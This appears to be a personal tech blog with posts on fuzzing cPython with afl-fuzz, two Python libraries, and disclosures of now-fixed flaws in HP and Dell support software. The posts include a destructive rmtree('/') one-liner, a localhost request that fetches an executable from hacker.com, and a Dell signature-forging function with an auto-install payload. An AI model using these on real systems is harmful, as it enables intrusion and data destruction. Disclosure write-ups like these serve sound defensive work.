Segfaulting Python with afl-fuzz

American Fuzzy Lop is both a really cool tool for fuzzing programs and an adorable breed of bunny. In this post I'm going to show you how to get the the tool (rather than the rabbit) up and running and find some crashes in the cPython interpreter.

Fuzzing?

Explaining in detail what fuzzing is would be a post in itself, so here is the summary from the Wikipedia article

Fuzz testing or fuzzing is a software testing technique, often automated or semi-automated, that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems. It is a form of random testing which has been used for testing hardware or software.

In laments terms it might be the equivalent of "throwing enough shit at a wall and to see what sticks". For example if you have a program that plays MP3 files written in an unsafe language like C/C++ fuzzing might involve taking a valid MP3 file and changing parts of the file and then attempting to play it. If the MP3 player works correctly any invalid files will result in an error, whereas if it is coded incorrectly the program will crash. Repeat this 1,000,000 times and you might find a lot of different bugs.

That's the long and short of it. AFL has some really clever tricks up its sleeve to make this process more efficient to the point where it can make up JPEG images from just running a JPEG parser or write valid Bash scripts. That's pretty awesome and made me want to have a crack at the Python, specifically the cPython interpreter.

Setting up afl-fuzz

For best results use Linux - OSX has some performance issues that make afl really slow and Windows isn't supported. The instructions below assume Ubuntu since that's what I used.

Downloading and compiling afl was really painless. Other than build-essential I didn't have to install any dependencies.

➜ ~ sudo apt-get install build-essential
➜ ~ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
➜ ~ tar xvf afl-latest.tgz && cd afl-2.06b
➜ ~ make -j8

After building the project with make you will have a few executables in the current directory including afl-gcc, afl-fuzz and afl-whatsup.

Fuzzing Python

Now we have our afl-fuzz executable we need to make a program for it to fuzz. To enable afl to fuzz a program it must meet two requirements: be compiled with afl-gcc (or afl-g++) and accept a file name through a command line parameter (or the data via stdin - no sockets for example). When afl starts fuzzing it generates testcases using something akin to black-magic, then writes each case to a file in a directory. It then invokes the target program with the path to that file, e.g my-program /afl/testcase1. The target should then read the file and do something with it, and because it is compiled with the special afl-gcc/g++ compilers afl-fuzz is able to understand what parts of the program executed. If it sees one testcase made the program execute in a new way it starts building new ones around that, allowing it to slowly map out large portions of the target and in theory find edge-cases that cause it to crash.

So I reasoned the simplest way to do this was just download the cPython source code, compile the interpreter with afl-gcc and then run it through afl-fuzz. The stock interpreter executes code from a file because that's what its built to do. Let's go grab the source code:

➜ ~ sudo apt-get install mercurial
➜ ~ cd ~
➜ ~ hg clone https://hg.python.org/cpython
➜ ~ cd cpython
➜ ~ hg checkout 3.5
➜ ~ CC=~/afl-2.06b/afl-gcc ./configure && make -j8

The configure script reads the name of the C compiler from an environment variable CC. By passing CC=~/afl-2.06b/afl-gcc you're telling it to use afl-gcc as the C compiler to build the interpreter. If you've done it right you should see lines line this in the output:

afl-as 2.06b by <[email protected]>
[+] Instrumented 97 locations (64-bit, non-hardened mode, ratio 100%).
../afl-gcc -pthread -c -Wno-unused-result -Wsign-compare -Wunreachable-code -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes    -Werror=declaration-after-statement   -I. -IInclude -I./Include    -DPy_BUILD_CORE -o Parser/grammar.o Parser/grammar.c
afl-cc 2.06b by <[email protected]>

So now we have our special interpreter we have one more thing to do before we run it through afl-fuzz: make some test cases. afl-fuzz works best if you give it some example programs to initially work with, so create some files in a directory like ~/python_testcases and fill them with simple Python syntax constructs, e.g:

class ABC(object):
    def x(self):
        for i in range(10):
            y = i + 2
            yield y

o = ABC()
yield from o.x()

Then invoke afl-fuzz like so:

➜ ~ ~/afl-2.06b/afl-fuzz -i python_testcases -o fuzz cpython/python @@

You should see a screen like the one below:

Fuzzing Python fast

Notice something about the image above?

Damn. That's terrible. We are never going to get anywhere with 20 executions a second - we need millions and millions to get good results. Lucky for us there is a trick we can use to greatly improve that speed.

Use llvm-mode and Python Bytecode files

Currently our target program is the CPython interpreter itself which has a bit of a large startup overhead. This includes reading the user environment, possibly executing a users site.py file etc. This is slow. We are also trying to feed it actual Python code which has to be parsed into bytecode before being executed, which is also an avoidable overhead. CPython actually stores these parsed bytecode files on disk as file_name.pyc in 2 and inside a __pycache__ directory in 3. These are just an optimization so that the interpreter doesn't have to constantly re-parse the source files. But the interpreter can execute them directly, and afl-fuzz happens to be work much better when working with binary formats over textual ones. To avoid the startup and parsing overhead we need to make a stripped down interpreter.

I've never actually written anything more than "hello world" in C so this was a bit of a learning curve. After reading the Python C documentation I figured the best way to go is to use PyRun_AnyFileEx. I made a new file inside cpython/Programs/ called test.c where I put the code my stripped down program and after a bit of tinkering I wrote the following C:

#include <Python.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    Py_NoSiteFlag = 1;
    Py_InitializeEx(0);
#ifdef __AFL_HAVE_MANUAL_CONTROL
    __AFL_INIT();
#endif
    FILE *f = fopen(argv[1], "rb");
    if(PyRun_AnyFileEx(f, argv[1],1 ) == -1) {
        printf("fail");
    }

    Py_Finalize();
    return 0;
}

The _AFL_INIT() code above is a special experimental feature of afl that greatly increases the speed of our fuzzing. In short it enables you to 'defer initialization' of afl until after an expensive initialization that the program has to execute. In this case the PyInitializeEx function is pretty slow so we place the __AFL_INIT() function after it, so that when afl is fuzzing the program it gets started from after Py_InitializeEx is called. This skips repeating the slow startup and speeds fuzzing up a lot, because we want to fuzz the PyRun_AnyFileEx function and not waste type running PyInitializeEx() over and over again. To enable this you have to compile a special afl tool called afl-clang-fast:

➜ ~ pushd ~/afl-2.06b/llvm_mode/
➜ ~ sudo apt-get install clang llvm-dev llvm
➜ ~ make
➜ ~ popd

And then run ./configure again with afl-clang-fast instead of afl-gcc:

➜ ~ CC=~/afl-2.06b/afl-clang-fast CXX=~/afl-2.06b/afl-clang-fast++ ./configure

This is optional though, it works fine without it.

After all this we have our target program, we need to make it build. Getting this bit working took a while because I had no idea what I was doing. In the end I manually added some code this code to the $(BUILDPYTHON) Makefile target:

# Build the interpreter
$(BUILDPYTHON): Programs/python.o $(LIBRARY) $(LDLIBRARY) $(PY3LIBRARY)
    $(LINKCC) $(PY_LDFLAGS) $(LINKFORSHARED) -o $@ Programs/python.o $(BLDLIBRARY) $(LIBS) $(MODLIBS) $(SYSLIBS) $(LDLAST)

    # New lines here:
    $(MAINCC) -c $(PY_CORE_CFLAGS) -o $(srcdir)/Programs/test.o $(srcdir)/Programs/test.c
    $(LINKCC) $(PY_LDFLAGS) $(LINKFORSHARED) -o Programs/test Programs/test.o $(BLDLIBRARY) $(LIBS) $(MODLIBS) $(SYSLIBS) $(LDLAST)

Yes, this is probably really horrible and not a good way to do this but it works. After running make -j8 you will have a file called test located inside Programs. If make errors don't worry, as long as the file is there then it will execute fine.

Running afl-fuzz

We have everything set, lets find some crashes. Compile your python testcases to pyc files with this command:

➜  ~ python3.4 -m compileall python_testcases
➜  ~ cp python_testcases/__pycache__/* python_testcases
➜  ~ mv python_testcases/*.py .

And then execute afl-fuzz. The -f input.pyc flag forces the input file to have the extension pyc which is required by Python when running pyc files:

➜  ~ afl-2.06b/afl-fuzz -i python_testcases -o fuzz -f input.pyc cpython/Programs/test @@

You should see the following screen:

Notice the speed: 373.4/sec, up from 20! And we've already found 100 unique crashes!

And to just confirm that those crashes are real and not because of our special program we can try them on the system python:

➜  ~ cp fuzz/crashes/id:000000,sig:11,src:000000,op:flip1,pos:13 test.pyc
➜  ~ python3.5 test.pyc
[1]    3689 segmentation fault  python3.5 test.pyc

It's worth pointing out here that this isn't really a problem or any kind of security risk. pyc files are internal to cPython and not many validation checks are run on them. If you're in a position to send someone malicious pyc code that crashes an interpreter a far more malicious thing would be to simply execute __import__('shutil').rmtree('/', ignore_errors=True) rather than crash the process.

Conclusion

So we've got afl-fuzz to find some real life crashes in the cPython interpreter, through fuzzing it's bytecode. We've also discovered that there are a lot of crashes and that the interpreter doesn't really protect itself against invalid bytecode, which takes a bit of the fun away.

The next step is to fire up a debugger like gdb and use it to explore why the bytecode crashes the interpreter. I'm going to write a post on how to do this in the near future because it's quite lengthy and this post is already long enough, but as a sample the first segfault afl found was in this code:

for (i = 0; i < n_cellvars; i++) {
    Py_ssize_t j;
    PyObject *cell = PyTuple_GET_ITEM(cellvars, i);
    for (j = 0; j < total_args; j++) {
        PyObject *arg = PyTuple_GET_ITEM(varnames, j);
        if (!PyUnicode_Compare(cell, arg)) {
            cell2arg[i] = j;
            used_cell2arg = 1;
            break;
        }
    }
}

The issue is that the line PyObject *arg = PyTuple_GET_ITEM(varnames, j); can be null if varnames is an empty tuple (which it can be if the pyc file is malformed). No null check is done on arg, which is passed to PyUnicode_Compare and this causes a segfault.

Scraping websites with Cyborg

I often find myself creating one-off scripts to scrape data off websites for various reasons. My go-to approach for this is to hack something together with Requests and BeautifulSoup, but this was getting tiring. Enter Cyborg, my library that makes writing web scrapers quick and easy.

Cyborg is an asyncio-based pipeline orientated scraping framework - in English that means you create a couple of functions to scrape individual parts of a site and throw them together in a sequence, with each of those parts running asynchronously and in parallel. Imagine you had a site with a list of users and you wanted to get the age and profile picture of each of them. Here's how this is done in Cyborg, showing off some of the cool features:

from cyborg import Job, scraper
from aiopipes.filters import unique
import sys

@scraper("http://somesite.com/list_of_users")
def scrape_user_list(data, response, output):
   for user in response.find("#list_of_users > li"):
       yield from output({
           "username": user.get(".username").text
       })

@scraper("http://somesite.com/user/{username}")
def scrape_user(data, response):
   data['age'] = response.get(".age").text
   data['profile_pic'] = response.get(".pic").attr["href"]
   return data

if __name__ == "__main__":
   pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
   pipeline > sys.stdout
   pipeline.monitor() > sys.stdout
   pipeline.run_until_complete()

That's it! The idea behind Cyborg is to keep the focus on the actual scraping, but getting benefits that are usually hard like parallel tasks, error handing and monitoring for free.

The library is very much in alpha, but you can find the project here on GitHub. Feedback welcome!

Our pipeline

Our pipeline is defined like so:

pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
pipeline > sys.stdout

The Job() class is the start of our pipeline and it holds information like the name of the task ('UserScraper'). We use the | operator to add tasks to the pipeline, the first one being scrape_user_list. Any output from that task is passed to unique, which as you may have guessed filters out duplicate usernames that may be produced. This then passes output to the scrape_user function, and the .parallel(5) means start 5 parallel workers to process usernames.

The > operator is used to pipe the output of the pipeline to the standard output, but this could be any file-like object or function instead. This means you could write an import_into_database function that takes some scraped data and use SQL to add them to a database.

A key aim of Cyborg is to make monitoring the pipeline simple. The pipeline.monitor() > sys.stdout handles this for us by piping status information every second to the standard output. Below is some sample output from a real version of our pipeline (one that handles pagination and does a bit more work). You can see a progress bar for each task, including the 5 scrape_user workers. Error totals are also displayed here, if there are any.

UserScraper: 3 pipes
Runtime: 9 seconds
 |-------- scrape_user_list
           Input: 14/26 read.  53% done
           [=========*          ]  14/26
           Tasks:
 |-------- unique 
           Input: 825/825 read. 100% done
           [===================*] 825/825
 |-------- scrape_user
           Input: 8/825 read.   0% done
           [*                   ]   8/825
           Tasks:
  |------- [*                   ]   3/66
  |------- [*                   ]   3/92
  |------- [===*                ]   5/22
  |------- [===============*    ]   8/10

Scrapers

A scraper is a function decorated with @scraper, with the first argument being the page URL that is to be scraped. The response to that URL is passed as a parameter to the function, and the function should parse it to extract relevant information.

The scrape_user_list function is fairly simple, it takes a static URL (/list_of_users) and runs a simple CSS query on it to find HTML elements we are interested in using. It then uses yield from output to output a dictionary to the next phase of the pipeline. We need to use a yield from statement here as our scraper could produce an arbitrary number of outputs, so the yield from ensures that output is buffered until tasks further down the pipeline are ready to handle them.

The dictionary produced by scrape_user_list is used to format the scrape_user URL. So if scrape_user_list produces {'username': 'test'} then scrape_user's URL will be resolved to /user/test. This is then fetched and the age + profile picture is extracted from the response and the output passed on. As this is the last function in the pipeline then it gets output to stdout in JSON format.

The library itself

The library is pretty new, I wrote a 'draft' version that I wasn't very happy and this is a re-write much closer to what I had imagined originally. You can find the code on GitHub, or use pip install cyborg to get it installed locally.

HtmlToWord is now WordInserter

I've released a redesign of my HtmlToWord library, specifically it now supports Markdown and multiple different ways to interact with Word. It's now also been renamed to WordInserter to reflect this.

Originally HtmlToWord was designed to take HTML input, process it and then insert a representation of it into a Word document. I made this for a project at my work involving taking HTML input from a user (created using a WYSIWYG editor) and generating a Word document containing this. I was surprised to find no native way to do this in Word (other than emulating copy+paste, eww), so I made and released HtmlToWord. That library was tied directly to HTML, each supported tag was a individual class responsible for rendering itself.

This quickly got messy, and in a future version of the project for work Markdown was used instead, so I decided to re-write the library from scratch to handle this. HtmlToWord uses the HTML input to create a number of objects, one for each tag, and then calls a Render method on each of them. As WordInserter needs to process both HTML and Markdown I decided to better decouple the parsing from the rendering, otherwise the library would be full of duplicate code. It now takes some supported input and creates a tree of operations to perform which is then recursively fed to a specific renderer responsible for processing it.

The result of this is the code is a lot cleaner and more maintainable, and it supports different ways to take the input and insert it into Word. Currently only COM is supported, but in the future if other projects that directly manipulate .docx files mature a bit I can create a renderer that works on Linux.

Using the library is super simple:

from wordinserter import render, parse
from comtypes.client import CreateObject

# This opens Microsoft Word and creates a new document.
word = CreateObject("Word.Application")
word.Visible = True # Don't set this to True in production!
document = word.Documents.Add()
from comtypes.gen import Word as constants

markdown = """
### This is a title

![I go below the image as a caption](http://placehold.it/150x150)

*This is **some** text* in a [paragraph](http://google.com)

  * Boo! I'm a **list**
"""

operations = parse(markdown, parser="markdown")
render(operations, document=document, constants=constants)

I have also created an automated test script that renders a bunch of HTML and Markdown documents in both FireFox and Word. This is used to make a comparison document to quickly find any regressions or issues. Judging by the number of installs from PyPi and the number of other contributors to the Github project this library is useful to some people, I hope that they take a look at the redesign.

Here is a snapshot of the top of the comparison page:

HP Support Solutions Framework Security Issue

After discovering the flaw in Dell's System Detect software I looked into other similar software for issues. This post details two issues I found with the HP Product Detection software and explores the protections HP put in place. I'm also going to explain how they could be easily bypassed to allow an attacker to force files to be downloaded, read arbitrary data, registry keys and system information through the users browser with little or no interaction.

Timeline:

HP were incredibly prompt at fixing the issue and responding to communications. They have addressed these problems in a new version (11.51.0049) and have issued a security notification, available here. An updated version can (and should) be downloaded from their support page

  • 25/3/2015 - Contacted HP with a writeup and received an acknowledgement that it has been passed to the relevant software team
  • 10/4/2015 - Received notification that the vulnerability has been fixed

Summary

Many large hardware vendors offer tools to automatically detect the hardware configuration of users machines to take them to the exact drivers that they require. Just like Dell, HP feature this software prominently on their support landing page.

Unfortunately just like Dell the HP software contains a number of functions that you wouldn't expect. When you click "Find Now" you are actually downloading the complete HP Support Solutions Framework which includes functionality to:

  • Read arbitrary files and registry keys
  • Collect system information
  • Summarize installed drivers and devices
  • Initiate the HP Download Assistant to download arbitrary files

The program also attempts to send any collected data back to HP servers and also attempts to stop anyone but the HP support staff accessing it, but as I will demonstrate these checks are easily bypassed. Due to the nature of the software this means that any of these functions can be invoked by any web page you visit without any notification, and combined with the fact that the program shows no visible sign of running and it starts with the machine automatically means this is a very dangerous piece of software.

The juicy details

As previously stated the software installs a service on your computer and listens for HTTP requests on localhost:8092. The JavaScript in your browser then communicates with this service by making AJAX requests to that local port. Below shows the page fetching the version information of the installed software:

When a browser makes a HTTP request the browser adds some information to the headers about the page or context that initiated the request, in the Referer (yes, spelt like that) and Origin headers. Under usual circumstances these requests would be coming from the HP support site, so the Referer header might have a value of http://www8.hp.com/uk/en/drivers.html.

So let's get right into the code and see how these headers are used. After decompiling the software we find the following (abbreviated) function inside SolutionsFrameworkService.SsfWebserver:

private void GetContextCallback(IAsyncResult result)
{
   string uriString;
   if (request.QueryString.Get("callback") != null)
      uriString = request.Headers["Referer"] ?? "http://hp.com";
   else
     uriString = request.Headers["Origin"] ?? "http://hp.com";

   if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))
   {
     ... error
   }
   else
   {
     ... process request
   }
}

The line we need to focus on is this:

if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))

In English this translates to if the hostname ends with hp.com, which is the only way the program authenticates a valid request. On the face of it this might look like a perfectly valid way to ensure that a HTTP request came from a valid HP domain however it is critically flawed. The check only checks if the domain ends with hp.com, so if a hacker were to register the domain nothp.com and make a request from there then it would pass the check. Apart from giving me Déjà vu it also gives me a foot in the door - any command I issue will be processed by the software. So let's see what commands can be processed.

Triggering a download

When the program processes a request it inspects the first two components of the requested path. The first is used to look up a controller, and the second component (if present) specifies the method. In the Chrome screenshot above it is making a request to the version controller, which has one default action that returns the software version. Looking through the source there are several interesting controllers, but we shall start with the HPDIAcontroller which is used to drive the "HP Download and Install Assistant". The actual code is pretty convoluted and not particularly relevant, but what is interesting is that if we make a request to (some unimportant parameters omitted):

http://localhost:8092/hpdia/run?RemoteFile=https://hacker.com/messbox.exe&FileTitle=update.exe

Then this triggers the download assistant to start, which brings itself to the foreground downloads the file:

I looked long and hard but the software doesn't automatically install anything without user interaction. However this doesn't render the attack useless, far from it. The attacker is able to control the displayed file title ("update.exe" in the screenshot) and can completely hide the real executable name by calling it "_.exe", which causes the download assistant to display "(.exe)" after it. One redeeming feature of this software is that it only accepts download requests for files that are served over HTTPS.

If an inexperienced user were to visit an malicious page that looked like a real HP site telling them to update their software and the HP download manager pops up I think many might press install, which would execute the attacker's malware and compromise their machines. For some advanced malware merely being downloaded could be enough.

Edit: Funnily enough I told my housemate about this and he said he had the HP download assistant pop up once while browsing a "dodgy torrent site". Perhaps this was already known?

Harvesting users information

The software contains a large number of "harvesters" (named so in the code) which can be used to steal files from the users machines and read other system information like registry keys or driver details. This attack is bit more complex and targeted than the one above, but could be even more dangerous if executed correctly.

When an HP support technician attempts to diagnose problems with a customer's computer they may need to read specific files on the user's computer, or access other possibly sensitive information. The normal and legitimate steps taken by the software when a technician wishes to read information from the users machines are as follows (please excuse my terrible diagrams):

  1. The support technician issues a request to the program instructing it to run the "idfservice" controller
  2. This controller then makes an HTTP request to the host diagsgmdextpro.houston.hp.com, with the product line of the HP machine the user is using. This returns a list of files to harvest
  3. The program then reads the specified portions of the files and sends them back to diagsgmdextpro.houston.hp.com
  4. The support technician presumably accesses this information to diagnose any issues.

You can view an example of the servers response by visiting the following URL: http://diagsgmdextpro.houston.hp.com/ediags/solutions/harvestertemplate?productLine=KV, and below is a snippet of the result that instructs the software to read a registry key:

<TemplateFile>
   <FileName>Hewlett-Packard\\HPActiveSupport\\Version</FileName>
   <MatchType>regex</MatchType>
   <Matches>
      <MatchExpression i:nil="true"/>
      <Matches>
         <MatchData>
            <MatchExpression>
                ^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$
            </MatchExpression>
            <Name>HPSAver</Name>
         </MatchData>
      </Matches>
      <Name i:nil="true"/>
   </Matches>
   <Source>registry</Source>
</TemplateFile>

This isn't actually a terrible system, because the system contacts an authoritative service to retrieve a list of files to download rather than accept this data from the client directly.

So how can an attacker exploit this? He or she need to trick the application into connecting to their server instead of one hosted by HP. One possible way to do this is to use a DNS spoofing attack (like DNS cache poisoning) so that the domain diagsgmdextpro.houston.hp.com resolves to an IP address they control. Another possible way is to man in the middle their connection, as they use a plaintext HTTP request to send and receive data. How to exactly do this is outside the scope of this post but it is possible.

Once done, the attacker can make the request to the users software and it will connect back to a machine that they control, which will instruct the software to read any file they choose. Thus the following happens:

  1. Attacker triggers the users browser into making a crafted request to the idfservice controller
  2. Program resolves the diagsgmdextpro.houston.hp.com to an attacker controlled IP and makes a request for files to read. The attacker returns a list of files he or she wants to read
  3. The program collects these files and sends them back to the diagsgmdextpro address, simply giving the data to the attacker.

As you can see from the sample XML above for each bit of data we read there has to be some form of filter in the form of a regular expression. We can simply use the expression .* to match the entire file. In the screenshot below I have made a simple web application that serves a malicious page that instructs the software to read C:\secret.txt and the user's system information. The console window to the left shows that the program has dutifully sent the data to the attacker controlled server.

Conclusion

I've described two flaws with the HP Solutions Framework that can be exploited to potentially compromise a users machine without much/any user interaction. While the first attack is not as bad as Dell's (which requires no user interaction at all) it could be just as dangerous to nontechnical users who might not consider a random HP download window popping up to be suspicious.

The second attack is more targeted than the first and requires more setup, but could be used to read sensitive user documents or information and pass it back to the attacker. This should be mitigated first by using HTTPS and second by explicitly verifying the servers SSL certificate to ensure it is connecting to a valid HP controlled server.

While I don't want to be too critical of HP because their response was prompt and speedy I do think that their security procedures are lacking if such software can be published by them. That being said they do make it clear to users that they are downloading the entire Support Solutions Framework and explain the functionality it includes.

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

Timeline:

The issue was fixed within two months and Dell were clear in their communications throughout.

  • 11/11/2014 - Contacted Dell about the issue and received an acknowledgement
  • 14/11/2014 - Received confirmation that Dells Internal Assessment team is investigating
  • 9/1/2015 - Dell state that they have fixed the issue by introducing additional validation and obfuscation
  • 10/1/2015 - Checked patched program and could not reproduce this exploit
  • 23/3/2015 - This post is published

Summary

Anyone who has owned a Dell will be familiar with the Dell Support page. You can get all the latest drivers for your exact machine configuration from this site by entering your Dell Service Tag, which can be found on a sticker somewhere on your machine or through clicking the shiny blue "Detect Product" button.

Clicking this button prompts you to download and install the "Dell System Detect" program, which is used to auto fill the service tag input and show you the relevant drivers for your machine.

While investigating this rather innocuous looking program I discovered that it accepts commands by listening for HTTP requests on localhost:8884 and that the security restrictions Dell put in place are easily bypassed, meaning an attacker could trigger the program to download and install any arbitrary executable from a remote location with no user interaction at all.

The interesting bit

If you click the button you are prompted to download and install the "Dell System Detect" program which conspicuously sits in your taskbar and starts itself with your machine. So this program is clearly part of the process of autodetecting the service tag, but how does the browser page communicate with it? You can use Chrome's excellent developer tools to view the network traffic of the page and see that it makes several requests to a service listening on localhost port 8884:

Ok, so it seems that the Dell System Detect runs a HTTP server that listens for requests, which are sent from the Dell Support page's JavaScript. So let's take a closer look at the program - it's a .NET 2.0 executable and can be completely decompiled with dotPeek into a set of Visual Studio solutions. A quick search through the code for "http" brings us to eSupport.Common.Client.Service.RequestHandlers.ProcessRequest which is responsible for processing a request through the processes HTTP port. Below is an abbreviated snippet showing how this function authenticates that requests come from a valid Dell domain:

public void ProcessRequest(HttpListenerContext context)
{
    String url = "";
    if (context.Request.UrlReferrer == null) url = context.Request.Headers["Origin"];
    else url = context.Request.UrlReferrer.AbsoluteUri;

    if (absoluteUri.Contains("dell"))
    {
        if (context.Request.HttpMethod == "GET")
          this.HandleGet(context);
        else if (context.Request.HttpMethod == "POST")
          this.HandlePost(context);
        ...
    }
}

So that's our first issue: the program attempts to verify that the request is sent from a Dell domain by only checking if "dell" is in either the HTTP Referrer or Origin headers. Why is this a problem? The HTTP Referrer can contain the full request URI including the host and path. This means an attacker could easily make a request with an origin of "http://hacker.com/dell" and this would pass the initial test as "dell" is in the string.

Armed with this information we can make requests to the program that are at least partially processed. Inside each of the method handlers (HandleGet, HandlePost) there is a fair bit of messy code, but below is a simplified version:

private void HandleGet(HttpListenerContext context)
{
  string[] urlParts = context.Request.Url.AbsolutePath.Split('/');
  MethodInfo method = FindService(urlParts[0]), urlParts[1]);

  string signature = context.Request.QueryString["signature"];
  string str3 = context.Request.QueryString["expires"];
  bool verified = new AuthenticationHandler().Authenticate(urlParts[0], urlParts[1], str3, signature);
  if (!verified) return Error()

  var result = method.Invoke(GetParameters(context.Request));
  return MakeResponse(result);
}

This function splits the request URL by the slash and uses the first two components to find the correct service to execute. In the Chrome screenshot above we see that the web page is making a request to clientservice/isalive, which means the program will execute the isalive method in the clientservice service.

After the service has been found it inspects two query string parameters, signature and expires, and passes them to the Authenticate method. If this passes then the service is invoked with other query string parameters as arguments.

It seems obvious by now that the program does a little bit more than simply retrieve your service tag, so before we look into the Authenticate method let's see what interesting things we can do.

Services

There are three services that can be used: diagnosticservice, downloadservice and clientservice. Within these are 25 methods, including getservicetag, getdevices, getsysteminfo, checkadminrights and downloadfiles. It seems that the entire Dell system support package is included with System Detect, meaning if we can bypass the authentication then we can trigger any of these methods.

The most interesting method is called downloadandautoinstall, which does exactly what it says on the tin.

[ServiceName("downloadservice")]
public class DownloadServiceLogic
{
    [RemoteMethodName("downloadandautoinstall")]
    public static ServiceResponse DownloadAndAutoInstall(string files)
    {
        // Download and execute URL's passed in the files parameter without prompting the user
    }
}

If we can bypass the Authenticate method then we can trigger this function which will download and execute whatever file we tell it to by making a request to http://localhost:8884/downloadservice/downloadandautoinstall. So lets take a look at the authenticate method which is the only thing stopping us:

public bool Authenticate(string service, string method, string expiration, string signature)
{
    var secret = string.Format("{0}_{1}_{2}_{3}", service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85");
    var hash = new SHA256Managed().ComputeHash(Encoding.UTF8.GetBytes(secret));

    string stringToEscape = Convert.ToBase64String(hash).TrimEnd('=');
    bool flag = stringToEscape.ToLower() == signature.ToLower() || Uri.EscapeDataString(stringToEscape).ToLower() == signature.ToLower();
    if (!flag)
        ErrorLog.WriteLog("Not authenticated");
    return flag;
}

Wow. Ok, so not exactly the hardest thing to break. The service, method, expiration and signature arguments are all attacker controlled and passed through GET arguments. The only thing not controlled by a remote attacker is the hard-coded GUID "2f68-48be-a09a-9f9b6424ad85".

Essentially all the function does is create a string with the arguments and the GUID then compare it with the one the user has given, and if it is a match the user is 'authenticated'. With this information in hand we can create a simple Python function to generate a valid signature:

def make_signature(service, method):
    expiration = int(time.time()) + 400000

    secret_string = "{}_{}_{}_{}".format(
        service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85"
    )

    hashed = hashlib.sha256(unicode(secret_string, "utf-8"))
    print("Secret: {}".format(secret_string))
    print("Hash: {}".format(hashed.hexdigest()))
    return expiration, base64.encodestring(hashed.digest()).rstrip(b"\n").rstrip(b"=")

If we can generate a valid token then we can trigger the "downloadandautoinstall" method with our arbitrary file by causing the user to make a GET request, which is very very easy to do. A simple way would be to embed an image in a web page with the source set to "http://localhost:8884/downloadservice/downloadandautoinstall" with the appropriate GET arguments. After some investigation it seems that the DownloadAutoInstall method needs a list of JSON strings containing information about files to download and install. Sending a JSON object like the following with a valid signature will trigger a download:

{
    "Name": "messbox.exe",
    "InstallOrder": 1,
    "IsDownload": True,
    "IsAutoInstall": True,
    "Location": r"http://www.greyhathacker.net/tools/messbox.exe"
 }

Conclusion

So in conclusion we can make anyone running this software download and install an arbitrary file by triggering their web browser to make a request to a crafted localhost URL. This can be achieved a number of ways, and the service will faithfully download and execute our payload without prompting the user.

I don't think Dell should be including all this functionality in such a simple tool and should have ensured adequate protection against malicious inputs. After contacting Dell and discussing the issue with their internal security team they pushed out a fix that included obfuscating the downloaded binary. While I cannot be sure I think they simply changed the conditional from "if dell in referrer" to "if dell in referrer domain name", which may be slightly harder to exploit but just as severe. There is now also a big agreement you have to accept before downloading that specifies what the software can do.